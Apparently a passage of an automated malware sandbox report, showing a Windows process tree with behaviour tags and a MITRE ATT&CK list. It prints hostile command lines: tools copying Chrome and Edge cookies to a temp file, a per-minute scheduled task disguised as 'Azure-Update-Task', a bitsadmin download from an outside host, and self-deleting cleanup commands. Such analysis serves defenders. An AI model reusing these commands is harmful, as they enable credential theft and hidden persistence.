    "C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:6020
  - - C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe
      "C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"
      4⤵
      Executes dropped EXE
      PID:5236
- - C:\Users\Admin\Documents\ObvJhkjc1_yeOR8FBjF3Ixme.exe
    "C:\Users\Admin\Documents\ObvJhkjc1_yeOR8FBjF3Ixme.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:5968
  - - C:\Program Files (x86)\Company\NewProduct\customer3.exe
      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:420
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6284
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        
        PID:6320
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6672
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        
        PID:6716
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5332
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        
        PID:6696
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5924
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        
        PID:5332
  - - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4764
  - - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
      4⤵
      Executes dropped EXE
      PID:3880
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5560
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2164
- - C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe
    "C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe"
    3⤵
    - Executes dropped EXE
    PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\Db4kZi5Qic.exe
      "C:\Users\Admin\AppData\Local\Temp\Db4kZi5Qic.exe"
      4⤵
      PID:6824
    - - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:6320
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe"
      4⤵
      PID:6844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:7040
- - C:\Users\Admin\Documents\7_LIYre9By4t8bLSgXZIvWBB.exe
    "C:\Users\Admin\Documents\7_LIYre9By4t8bLSgXZIvWBB.exe"
    3⤵
    - Executes dropped EXE
    PID:5900
  - - C:\Users\Admin\AppData\Roaming\8605518.exe
      "C:\Users\Admin\AppData\Roaming\8605518.exe"
      4⤵
      Executes dropped EXE
      PID:6136
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6136 -s 1932
        5⤵
        Program crash
        
        PID:5244
  - - C:\Users\Admin\AppData\Roaming\4261173.exe
      "C:\Users\Admin\AppData\Roaming\4261173.exe"
      4⤵
      Executes dropped EXE
      PID:5032
- - C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe
    "C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"
    3⤵
    - Executes dropped EXE
    PID:6080
  - - C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe
      "C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"
      4⤵
      PID:3036
- - C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe
    "C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3584
  - - C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe
      C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe
      4⤵
      Executes dropped EXE
      PID:5156
- - C:\Users\Admin\Documents\N5awg6WF21NeZ4xqPl67lJoP.exe
    "C:\Users\Admin\Documents\N5awg6WF21NeZ4xqPl67lJoP.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3940
- - C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe
    "C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5044
  - - C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe
      C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe
      4⤵
      PID:5332
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 24
        5⤵
        Program crash
        
        PID:6036
- - C:\Users\Admin\Documents\AcakfVHVK3ZpOKofv4SFb_LD.exe
    "C:\Users\Admin\Documents\AcakfVHVK3ZpOKofv4SFb_LD.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:2368
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:5768
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:6456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:6152
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:1776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:4004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:3884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"
      4⤵
      PID:4492
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
      4⤵
      Download via BitsAdmin
      PID:6496
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"
  2⤵
  PID:6520
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub2.exe"
  2⤵
  PID:6772
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\mysetold.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\mysetold.exe"
  2⤵
  PID:6636
- - C:\Users\Public\run.exe
    C:\Users\Public\run.exe
    3⤵
    PID:6796
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
      4⤵
      PID:5596
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:5744
- - C:\Users\Public\run2.exe
    C:\Users\Public\run2.exe
    3⤵
    PID:5332
  - - C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
      "C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"
      4⤵
      PID:7144
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files.exe"
  2⤵
  PID:5436
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5844
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:6288

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:4660
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1108

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4492

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4512

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4488

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\1E29.exe
C:\Users\Admin\AppData\Local\Temp\1E29.exe
1⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\2E08.exe
C:\Users\Admin\AppData\Local\Temp\2E08.exe
1⤵
PID:1660

C:\Users\Admin\AppData\Local\Temp\550A.exe
C:\Users\Admin\AppData\Local\Temp\550A.exe
1⤵
PID:2940

C:\Users\Admin\AppData\Local\Temp\5EA0.exe
C:\Users\Admin\AppData\Local\Temp\5EA0.exe
1⤵
PID:4772

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\70C1.exe
C:\Users\Admin\AppData\Local\Temp\70C1.exe
1⤵
PID:3788

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3064

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2472

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2628

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6984

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4516

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4568

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7156

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

BITS Jobs

T1197

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery